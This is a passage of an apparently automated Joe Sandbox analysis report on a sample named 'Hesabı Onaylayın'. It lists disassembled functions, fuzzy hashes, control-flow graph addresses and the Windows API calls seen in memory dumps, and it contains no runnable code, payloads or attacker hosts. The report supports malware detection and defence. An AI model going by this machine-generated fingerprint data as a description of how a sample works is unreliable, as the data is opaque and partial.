                                                            • Instruction Fuzzy Hash: E691D274E102098FCB08CFEAC984AAEFBF2AF89304F14952AD419BB364D7359945CF54
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0219C720 Relevance: .2, Instructions: 201COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.359062331.0000000002190000.00000040.00000800.00020000.00000000.sdmp, Offset: 02190000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_2190000_Hesab#U0131 Onaylay#U0131n.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: dd539dba135ae1b23f5c3918f96360ba74d857cf2c49ab2ecf834d0329663019
                                                            • Instruction ID: dce775bfa57f3b64b6358e1cc6d1a85aeed5831ef0f9b1f18fe3bf0930d5265c
                                                            • Opcode Fuzzy Hash: dd539dba135ae1b23f5c3918f96360ba74d857cf2c49ab2ecf834d0329663019
                                                            • Instruction Fuzzy Hash: AE81B174E102098FCB08CFEAD984AAEFBF2AF89310F10942AD519BB364D7359945CF54
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 05BE3B88 Relevance: .2, Instructions: 184COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.361081489.0000000005BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BE0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_5be0000_Hesab#U0131 Onaylay#U0131n.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 4c1c04fd10fa45b4fe1a3031760fc6dc0b1098707ebd51842ab807d74727c0c9
                                                            • Instruction ID: 3b4d31c2d8c36bda553227891e06ec8e2900717b924ff12f104d108e6abbe602
                                                            • Opcode Fuzzy Hash: 4c1c04fd10fa45b4fe1a3031760fc6dc0b1098707ebd51842ab807d74727c0c9
                                                            • Instruction Fuzzy Hash: FB81F074E05249CFDB14DFA9D5845ADBFB2FB88300F24846AD806AB354D734A941CF51
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 05BE4B58 Relevance: .2, Instructions: 184COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.361081489.0000000005BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BE0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_5be0000_Hesab#U0131 Onaylay#U0131n.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 0ff946e865de83ec8a0dc51161f1d79d6bef6e40c7bd929aa2b1581771d95959
                                                            • Instruction ID: 70be0da2a6b477452db2f7b5aa001f8c5cff76b8b443a8a884efd016f251e085
                                                            • Opcode Fuzzy Hash: 0ff946e865de83ec8a0dc51161f1d79d6bef6e40c7bd929aa2b1581771d95959
                                                            • Instruction Fuzzy Hash: BA8112B4D49219DFCF14CFA1D6456EEBBF2FB88300F1494AAD001BA254D779AA01CF68
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 05BE4B49 Relevance: .2, Instructions: 182COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.361081489.0000000005BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BE0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_5be0000_Hesab#U0131 Onaylay#U0131n.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 318367d8ff74dcd6fa7bdf6716ad0059914280be16cf520efcab5433ebd35fe2
                                                            • Instruction ID: 54b8fc13e323410f1aea55da2ae9479b72bd30456ba266f55820538875ad4688
                                                            • Opcode Fuzzy Hash: 318367d8ff74dcd6fa7bdf6716ad0059914280be16cf520efcab5433ebd35fe2
                                                            • Instruction Fuzzy Hash: C1712175D49219CFCF04CFA1D6446EEBBF2FB89301F1494AAD001BA254D77AAA05CF68
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 05BE5FB1 Relevance: .2, Instructions: 170COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.361081489.0000000005BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BE0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_5be0000_Hesab#U0131 Onaylay#U0131n.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e337f64e7ca39db5db6d7c269fdcf73bb0e6991d4224dd17153dec9c91b66585
                                                            • Instruction ID: 8050487069e055f74f2ec03263af091e544740e2b9fa672991e5f237d0aa2b5b
                                                            • Opcode Fuzzy Hash: e337f64e7ca39db5db6d7c269fdcf73bb0e6991d4224dd17153dec9c91b66585
                                                            • Instruction Fuzzy Hash: A4717774D04209DFCB14CFB9E8846ADBFB2FF89305F2494AAD412A7294D738AA41CF54
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 05BE8430 Relevance: .2, Instructions: 154COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.361081489.0000000005BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BE0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_5be0000_Hesab#U0131 Onaylay#U0131n.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 505c7055ac1e039703db8381e68a90392b9ec2433ce005052bed864b8971b6fc
                                                            • Instruction ID: d5ca96ff658d1dd23bd2d76ef969b6dcfcbfdb300ca8c4c6ad5105a341c9400e
                                                            • Opcode Fuzzy Hash: 505c7055ac1e039703db8381e68a90392b9ec2433ce005052bed864b8971b6fc
                                                            • Instruction Fuzzy Hash: 1A514974D1560ADFCB04CFA5E5856EEFBB2EF88300F28946AE405B7254D734AA41CF91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 05BE47D0 Relevance: .2, Instructions: 152COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.361081489.0000000005BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BE0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_5be0000_Hesab#U0131 Onaylay#U0131n.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 6500ce1f9c0248ea196ce4ca79520d271b8f37b738275b6071a6f20e901b23dd
                                                            • Instruction ID: ea34efd37cd1dcbf656ad5be77a742b837f9a79a662c2dc5d76fa0c2d94791dc
                                                            • Opcode Fuzzy Hash: 6500ce1f9c0248ea196ce4ca79520d271b8f37b738275b6071a6f20e901b23dd
                                                            • Instruction Fuzzy Hash: 6D5157B4D16249DFCF14CFA1D0856AEBFB2FB89306F14946AC412BB254D7399A42CF90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 05BE8423 Relevance: .2, Instructions: 151COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.361081489.0000000005BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BE0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_5be0000_Hesab#U0131 Onaylay#U0131n.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b20899f61a4584f7dde5d0e920573f919bf5d58104116d9b62285869da381723
                                                            • Instruction ID: f0f20063d6d6633a98df0554a6340f8839728e5713858b14276501edb657eb92
                                                            • Opcode Fuzzy Hash: b20899f61a4584f7dde5d0e920573f919bf5d58104116d9b62285869da381723
                                                            • Instruction Fuzzy Hash: 80515874D0560ADFCB04CFA5E5856EEFBB2EF88300F28942AE405B7254D734AA41CF91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0219CEA8 Relevance: .1, Instructions: 149COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.359062331.0000000002190000.00000040.00000800.00020000.00000000.sdmp, Offset: 02190000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_2190000_Hesab#U0131 Onaylay#U0131n.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 0e6d05cf6eb63d9eea60131b0c81852743525c71bf5be6a80c88743818b4fba2
                                                            • Instruction ID: ede1e5372c049c326a4d3ac7aceee0abbf51a73d241cae4c3fd4b2016ad470cf
                                                            • Opcode Fuzzy Hash: 0e6d05cf6eb63d9eea60131b0c81852743525c71bf5be6a80c88743818b4fba2
                                                            • Instruction Fuzzy Hash: A45127B0E04219CFDB08CFAAD9446AEFBF2AF8D301F14D56AD459A7254D7348A41CFA4
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 05BE6F5A Relevance: .1, Instructions: 132COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.361081489.0000000005BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BE0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_5be0000_Hesab#U0131 Onaylay#U0131n.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ca64e06dc4dbf1b3e360e9c2b8b534d389d27cd3335387dc3c04d1f251785300
                                                            • Instruction ID: 3df33c78547284d5b57affbc79d7d0827c4a6ee98bf79cac563ed32940ccf135
                                                            • Opcode Fuzzy Hash: ca64e06dc4dbf1b3e360e9c2b8b534d389d27cd3335387dc3c04d1f251785300
                                                            • Instruction Fuzzy Hash: CD513874E152598FCB04CFA9E540AEEBBF2FB89314F18946AD405F7250E734AA01CF55
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 05BE6F60 Relevance: .1, Instructions: 129COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.361081489.0000000005BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BE0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_5be0000_Hesab#U0131 Onaylay#U0131n.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 84e86f631eed0902dbc3a53bf8800fbfad5d679a63ce276c282480c5f14b2605
                                                            • Instruction ID: ca17de6b91e9715b01ff3cd3a2d688801dba82283fb81f35995885563fdb5c48
                                                            • Opcode Fuzzy Hash: 84e86f631eed0902dbc3a53bf8800fbfad5d679a63ce276c282480c5f14b2605
                                                            • Instruction Fuzzy Hash: 0B510478E15259CFCB04CFA9D540AEEBBF2FB89310F14946AD415B7250E734AA01CFA5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0219D800 Relevance: .1, Instructions: 71COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.359062331.0000000002190000.00000040.00000800.00020000.00000000.sdmp, Offset: 02190000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_2190000_Hesab#U0131 Onaylay#U0131n.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 744ab69db704c5d5ea20d30dd753be9bb845b996d14af0401faeba7027610ded
                                                            • Instruction ID: 43e05b13972395037444d751a1619bd53d83098e3b4adc8af7254d46e372cb78
                                                            • Opcode Fuzzy Hash: 744ab69db704c5d5ea20d30dd753be9bb845b996d14af0401faeba7027610ded
                                                            • Instruction Fuzzy Hash: 8221E5B1E006188BEB18CFABD9446DEFBF7AFC9310F14C56AD408A6259DB305A56CF50
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 02195F26 Relevance: 2.8, Strings: 2, Instructions: 287COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 528 2195f26-2195f3f 529 2195f5b-2195f6b call 2195d78 528->529 530 2195f41-2195f59 528->530 535 2195f70-2195f75 529->535 530->535 674 2195f77 call 2196220 535->674 675 2195f77 call 2195f26 535->675 536 2195f7d-2195f83 537 2196209-219622e 536->537 538 2195f89-2195f97 536->538 548 219623d-219624f 537->548 549 2196230-2196236 537->549 541 2195f99-2195fa0 538->541 542 2195fef-2195ff8 538->542 546 21960f9-2196125 541->546 547 2195fa6-2195fab 541->547 544 219612c-2196158 542->544 545 2195ffe-2196002 542->545 598 219615f-21961c9 544->598 550 2196013-2196028 545->550 551 2196004-219600d 545->551 546->544 552 2195fad-2195fb3 547->552 553 2195fc3-2195fd1 547->553 560 21962e3-21962e7 call 219646f 548->560 561 2196255-2196259 548->561 549->548 667 219602b call 2196a38 550->667 668 219602b call 21969a0 550->668 551->544 551->550 555 2195fb5 552->555 556 2195fb7-2195fc1 552->556 569 2195fda-2195fea 553->569 570 2195fd3-2195fd5 553->570 555->553 556->553 559 2196031-2196038 563 219603a-219604e 559->563 564 2196053-2196057 559->564 572 21962ed-21962f3 560->572 567 2196269-2196276 561->567 568 219625b-2196267 561->568 575 21960ef-21960f6 563->575 573 219605d-2196061 564->573 574 21961d0-2196202 564->574 585 2196278-2196282 567->585 568->585 569->575 570->575 577 21962ff-2196306 572->577 578 21962f5-21962fb 572->578 573->574 580 2196067-2196072 573->580 574->537 587 21962fd 578->587 588 2196361-21963c0 578->588 580->574 595 2196078-2196095 580->595 596 21962af-21962b3 585->596 597 2196284-2196293 585->597 587->577 611 21963c7-21963dd 588->611 672 2196098 call 2196a38 595->672 673 2196098 call 21969a0 595->673 601 21962bf-21962c3 596->601 602 21962b5-21962bb 596->602 613 21962a3-21962ad 597->613 614 2196295-219629c 597->614 598->574 599 219609e-21960a5 599->574 604 21960ab-21960ba 599->604 601->577 608 21962c5-21962c9 601->608 606 2196309-219635a 602->606 607 21962bd 602->607 676 21960bd call 219840d 604->676 677 21960bd call 2198350 604->677 678 21960bd call 2198360 604->678 606->588 607->577 610 21962cf-21962e1 608->610 608->611 610->577 623 21963df-21963eb 611->623 624 2196403 611->624 613->596 614->613 616 21960c3-21960c7 616->598 620 21960cd-21960d9 616->620 670 21960db call 2199968 620->670 671 21960db call 2199af0 620->671 627 21963ed-21963ef 623->627 628 21963f1-21963f3 623->628 632 2196404-2196406 624->632 634 2196469-219646c 627->634 628->632 635 21963f5-21963f9 628->635 631 21960e1-21960e7 631->574 637 21960ed 631->637 638 2196419-219641f 632->638 639 2196408-219640c 632->639 640 21963fb-21963fd 635->640 641 21963ff-2196402 635->641 637->575 645 219644a-219644c 638->645 646 2196421-2196448 638->646 643 219640e-2196410 639->643 644 2196412-2196417 639->644 640->634 641->634 643->634 644->634 649 2196453-2196455 645->649 646->649 653 219645b-219645d 649->653 654 2196457-2196459 649->654 657 219645f-2196464 653->657 658 2196466 653->658 654->634 657->634 658->634 667->559 668->559 670->631 671->631 672->599 673->599 674->536 675->536 676->616 677->616 678->616
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.359062331.0000000002190000.00000040.00000800.00020000.00000000.sdmp, Offset: 02190000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_2190000_Hesab#U0131 Onaylay#U0131n.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: Xc(i$Xc(i
                                                            • API String ID: 0-3138704727
                                                            • Opcode ID: a227dd02cf1f7e2eb77da3b838e2a26549e3b31dd3ea506fd6e93fa6fb5ad14d
                                                            • Instruction ID: 6caea924947aa88aabb8cc20df9576d514f9371d6bbc38f25edba3a7d6fabf8e
                                                            • Opcode Fuzzy Hash: a227dd02cf1f7e2eb77da3b838e2a26549e3b31dd3ea506fd6e93fa6fb5ad14d
                                                            • Instruction Fuzzy Hash: 11A1D134B401149FDF19EFA4D858BAE77EAEB88755F048829F50ADB294CB709D01CBA1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 02196618 Relevance: 2.7, Strings: 2, Instructions: 233COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 679 2196618-2196625 680 219662d-219662f 679->680 681 2196627-219662b 679->681 683 2196840-2196847 680->683 681->680 682 2196634-219663f 681->682 684 2196848 682->684 685 2196645-219664c 682->685 688 219684d-2196885 684->688 686 21967e1-21967e7 685->686 687 2196652-2196661 685->687 690 21967e9-21967eb 686->690 691 21967ed-21967f1 686->691 687->688 689 2196667-2196676 687->689 709 219688e-2196892 688->709 710 2196887-219688c 688->710 697 2196678-219667b 689->697 698 219668b-219668e 689->698 690->683 692 219683e 691->692 693 21967f3-21967f9 691->693 692->683 693->684 695 21967fb-21967fe 693->695 695->684 699 2196800-2196815 695->699 700 219669a-21966a0 697->700 701 219667d-2196680 697->701 698->700 702 2196690-2196693 698->702 718 2196839-219683c 699->718 719 2196817-219681d 699->719 711 21966b8-21966d5 700->711 712 21966a2-21966a8 700->712 704 2196781-2196787 701->704 705 2196686 701->705 706 2196695 702->706 707 21966e6-21966ec 702->707 713 2196789-219678f 704->713 714 219679f-21967a9 704->714 715 21967ac-21967b9 705->715 706->715 716 21966ee-21966f4 707->716 717 2196704-2196716 707->717 720 2196898-219689a 709->720 710->720 751 21966de-21966e1 711->751 721 21966aa 712->721 722 21966ac-21966b6 712->722 723 2196791 713->723 724 2196793-219679d 713->724 714->715 743 21967bb-21967bf 715->743 744 21967cd-21967cf 715->744 726 21966f8-2196702 716->726 727 21966f6 716->727 737 2196718-2196724 717->737 738 2196726-2196749 717->738 718->683 728 219682f-2196832 719->728 729 219681f-219682d 719->729 730 219689c-21968ae 720->730 731 21968af-21968b6 720->731 721->711 722->711 723->714 724->714 726->717 727->717 728->684 735 2196834-2196837 728->735 729->684 729->728 735->718 735->719 753 2196771-219677f 737->753 738->684 755 219674f-2196752 738->755 743->744 746 21967c1-21967c5 743->746 747 21967d3-21967d6 744->747 746->684 752 21967cb 746->752 747->684 748 21967d8-21967db 747->748 748->686 748->687 751->715 752->747 753->715 755->684 757 2196758-219676a 755->757 757->753
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.359062331.0000000002190000.00000040.00000800.00020000.00000000.sdmp, Offset: 02190000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_2190000_Hesab#U0131 Onaylay#U0131n.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: Xc(i$Xc(i
                                                            • API String ID: 0-3138704727
                                                            • Opcode ID: 2b4ff996a1921ae5dbad687042db5bc1daad4d509b74acdf65432ef5bfed2dd8
                                                            • Instruction ID: a8b4db2631b91147ff66efeb3d5be4b791620d7875cafe7907adf629b617977d
                                                            • Opcode Fuzzy Hash: 2b4ff996a1921ae5dbad687042db5bc1daad4d509b74acdf65432ef5bfed2dd8
                                                            • Instruction Fuzzy Hash: 50818A74A40245CFCF18CFA9C884AAEB7BAFF89614B158069D415DB365DB31E841CFA1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0B3A2598 Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 935 b3a2598-b3a25fe 936 b3a2609-b3a2610 935->936 937 b3a2600-b3a2606 935->937 938 b3a261b-b3a26ba CreateWindowExW 936->938 939 b3a2612-b3a2618 936->939 937->936 941 b3a26bc-b3a26c2 938->941 942 b3a26c3-b3a26fb 938->942 939->938 941->942 946 b3a2708 942->946 947 b3a26fd-b3a2700 942->947 947->946
                                                            APIs
                                                            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0B3A26AA
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.362204995.000000000B3A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B3A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_b3a0000_Hesab#U0131 Onaylay#U0131n.jbxd
                                                            Similarity
                                                            • API ID: CreateWindow
                                                            • String ID:
                                                            • API String ID: 716092398-0
                                                            • Opcode ID: bc171be41c0e6129664ccc3f7aaf11825ef9103cdfa48ed45c4b43f1f7350586
                                                            • Instruction ID: 2636c3dbe1ea574e7a4d5ce9f7a1ac53b0616a3f15d245b17b8451196169d638
                                                            • Opcode Fuzzy Hash: bc171be41c0e6129664ccc3f7aaf11825ef9103cdfa48ed45c4b43f1f7350586
                                                            • Instruction Fuzzy Hash: C541CEB1D10308AFDB14CF99C984ADEBBB5FF88714F24852AE819AB210D775A845CF90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0B3A159C Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 948 b3a159c-b3a4b7c 951 b3a4c2c-b3a4c4c call b3a1474 948->951 952 b3a4b82-b3a4b87 948->952 959 b3a4c4f-b3a4c5c 951->959 954 b3a4bda-b3a4c12 CallWindowProcW 952->954 955 b3a4b89-b3a4bc0 952->955 957 b3a4c1b-b3a4c2a 954->957 958 b3a4c14-b3a4c1a 954->958 961 b3a4bc9-b3a4bd8 955->961 962 b3a4bc2-b3a4bc8 955->962 957->959 958->957 961->959 962->961
                                                            APIs
                                                            • CallWindowProcW.USER32(?,?,?,?,?), ref: 0B3A4C01
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.362204995.000000000B3A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B3A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_b3a0000_Hesab#U0131 Onaylay#U0131n.jbxd
                                                            Similarity
                                                            • API ID: CallProcWindow
                                                            • String ID:
                                                            • API String ID: 2714655100-0
                                                            • Opcode ID: 36096b78e610fcfbfc6a73c5a183545c96174781f9fd50160bf08acfd9401046
                                                            • Instruction ID: e309123b575dfa67d9d1811b66d4191aeec3c7b6dcb9e3657b403b77d597d8aa
                                                            • Opcode Fuzzy Hash: 36096b78e610fcfbfc6a73c5a183545c96174781f9fd50160bf08acfd9401046
                                                            • Instruction Fuzzy Hash: 82414CB5A00245DFCB14CF99C488BAABBF5FF89314F24C999D519A7321D774A841CFA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 05BE8243 Relevance: 1.6, APIs: 1, Instructions: 68COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 965 5be8243-5be829a 968 5be829c-5be82a2 965->968 969 5be82a5-5be82a9 965->969 968->969 970 5be82ab-5be82ae 969->970 971 5be82b1-5be82e2 MoveFileExW 969->971 970->971 972 5be82eb-5be8313 971->972 973 5be82e4-5be82ea 971->973 973->972
                                                            APIs
                                                            • MoveFileExW.KERNEL32(?,00000000,?), ref: 05BE82D5
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.361081489.0000000005BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BE0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_5be0000_Hesab#U0131 Onaylay#U0131n.jbxd
                                                            Similarity
                                                            • API ID: FileMove
                                                            • String ID:
                                                            • API String ID: 3562171763-0
                                                            • Opcode ID: 847e90ca0cd58c74a1e29297c384e2415c137095df4d48106813554bef0dff25
                                                            • Instruction ID: 034e1b67dd8d73551921ba2cfff8c81a1772aeb57916ab9c798512615a4203d3
                                                            • Opcode Fuzzy Hash: 847e90ca0cd58c74a1e29297c384e2415c137095df4d48106813554bef0dff25
                                                            • Instruction Fuzzy Hash: 622117B5C016199FCB10CF99D5847DEBBF5FF88310F14856AE908BB244D734A944CBA4
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 05BE8248 Relevance: 1.6, APIs: 1, Instructions: 67COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 976 5be8248-5be829a 978 5be829c-5be82a2 976->978 979 5be82a5-5be82a9 976->979 978->979 980 5be82ab-5be82ae 979->980 981 5be82b1-5be82e2 MoveFileExW 979->981 980->981 982 5be82eb-5be8313 981->982 983 5be82e4-5be82ea 981->983 983->982
                                                            APIs
                                                            • MoveFileExW.KERNEL32(?,00000000,?), ref: 05BE82D5
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.361081489.0000000005BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BE0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_5be0000_Hesab#U0131 Onaylay#U0131n.jbxd
                                                            Similarity
                                                            • API ID: FileMove
                                                            • String ID:
                                                            • API String ID: 3562171763-0
                                                            • Opcode ID: 7b0e6a877ddcaee4007a7a5c14988403a6344b7a2740f905289abc3c3ed8cab9
                                                            • Instruction ID: 68f4ec45d369355b9a84eb0aaf871b5cb903dc4faed546665399db044e20ce75
                                                            • Opcode Fuzzy Hash: 7b0e6a877ddcaee4007a7a5c14988403a6344b7a2740f905289abc3c3ed8cab9
                                                            • Instruction Fuzzy Hash: 782115B5C016199FCB10CF99D5846DEBBF5FF88320F14856AE908AB244D734A944CBA4
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 05BE7798 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • PostMessageW.USER32(?,00000010,00000000,?), ref: 05BE8ADD
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.361081489.0000000005BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BE0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_5be0000_Hesab#U0131 Onaylay#U0131n.jbxd
                                                            Similarity
                                                            • API ID: MessagePost
                                                            • String ID:
                                                            • API String ID: 410705778-0
                                                            • Opcode ID: df1578928b04efd41990e2762d5a8bd73ce4c07a55406988bc40fccde52d0c7e
                                                            • Instruction ID: d3bef9ebe203d36bea526494facfd47340de8cb034d2d65eb1a94cb998f85460
                                                            • Opcode Fuzzy Hash: df1578928b04efd41990e2762d5a8bd73ce4c07a55406988bc40fccde52d0c7e
                                                            • Instruction Fuzzy Hash: 7B11F2B68006099FCB20CF99D889BDFBBF8EB48324F148459E555A7600C374A944CFA5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 05BE8A7B Relevance: 1.5, APIs: 1, Instructions: 45windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • PostMessageW.USER32(?,00000010,00000000,?), ref: 05BE8ADD
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.361081489.0000000005BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05BE0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_5be0000_Hesab#U0131 Onaylay#U0131n.jbxd
                                                            Similarity
                                                            • API ID: MessagePost
                                                            • String ID:
                                                            • API String ID: 410705778-0
                                                            • Opcode ID: e7cc7a01a42001863a42fbe26c43366788b6a02b7233071036ad737d33547df0
                                                            • Instruction ID: 1956391aad8f9f1582db5b6f35a42116c9968cfa00677697441f15cb7060ae5e
                                                            • Opcode Fuzzy Hash: e7cc7a01a42001863a42fbe26c43366788b6a02b7233071036ad737d33547df0
                                                            • Instruction Fuzzy Hash: 061103B68003099FCB10CF99D885BDFBBF8FB48324F148459E515A3600C374A944CFA5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0B3A27E0 Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SetWindowLongW.USER32(?,?,?), ref: 0B3A283D
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.362204995.000000000B3A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B3A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_b3a0000_Hesab#U0131 Onaylay#U0131n.jbxd
                                                            Similarity
                                                            • API ID: LongWindow
                                                            • String ID:
                                                            • API String ID: 1378638983-0
                                                            • Opcode ID: 8a775271d652de87caaa287c5af521f0ef0a1851f0dfb46b285ef9c407e22354
                                                            • Instruction ID: 7af62062efb5d9e248c0a6ca9e1d349960468cfda1786e8a6bfc3af75ba83fa3
                                                            • Opcode Fuzzy Hash: 8a775271d652de87caaa287c5af521f0ef0a1851f0dfb46b285ef9c407e22354
                                                            • Instruction Fuzzy Hash: 4C11D3B58002099FDB10CF99D985BDFFBF8EB48324F24845AE959A7600C374A945CFA1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 02199C40 Relevance: 1.5, Strings: 1, Instructions: 251COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.359062331.0000000002190000.00000040.00000800.00020000.00000000.sdmp, Offset: 02190000, based on PE: false
